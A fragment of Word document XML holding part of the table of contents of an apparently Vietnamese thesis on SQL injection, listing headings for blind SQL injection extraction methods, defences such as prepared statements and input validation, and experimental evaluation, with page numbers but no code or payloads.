            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</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2" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.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Phương pháp sắp xếp và trích xuất dựa trên thứ tự trả về của dữ liệu</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822512 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</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3" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.2.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Giới hạn của phương pháp</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822513 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>54</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4" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.3.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mở rộng trong tấn công Blind SQL injection</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822514 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</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15" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.</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Giải pháp phòng chống tấn công SQL injection</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822515 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</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6" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.1.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sử dụng Domain Driven Security</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822516 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</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7" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.2.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sử dụng kỹ thuật Prepare Statement</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822517 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>59</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8" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.3.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sử dụng xác nhận đầu vào (Validating input)</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822518 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>62</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19" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.4.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sử dụng kỹ thuật phòng thủ mức Platform level</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822519 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>64</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20" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Xây dựng thực nghiệm và đánh giá kết quả tối ưu hóa</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822520 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>65</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1" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.1.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Xây dựng mô hình tấn công và môi trường thực nghiệm</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822521 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>66</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2" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.2.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Xây dựng mã tấn công sử dụng phương pháp tìm kiếm nhị phân</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822522 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>73</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3" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.3.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Xây dựng mã tấn công sử dụng phương pháp dịch bit</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822523 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>76</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4" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.4.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Xây dựng mã tấn công sử dụng phương pháp phân tích thứ tự trả về</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822524 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>77</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005447AB" w:rsidRDefault="001E10B4" w:rsidP="008E1FF3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9395"/>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8931"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc459822525" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.5.</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Thử nghiệm và đánh giá kết quả</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822525 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>79</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526" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>KẾT LUẬN</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822526 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>87</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527" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>TÀI LIỆU THAM KHẢO</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822527 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>89</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="005447AB" w:rsidRDefault="001E10B4" w:rsidP="008E1FF3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9395"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8931"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc459822528" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>PHỤ LỤC</w:t>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459822528 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005447AB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F5912">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>90</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29" w:history="1">
            <w:r w:rsidR="005447AB" w:rsidRPr="00655B18">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
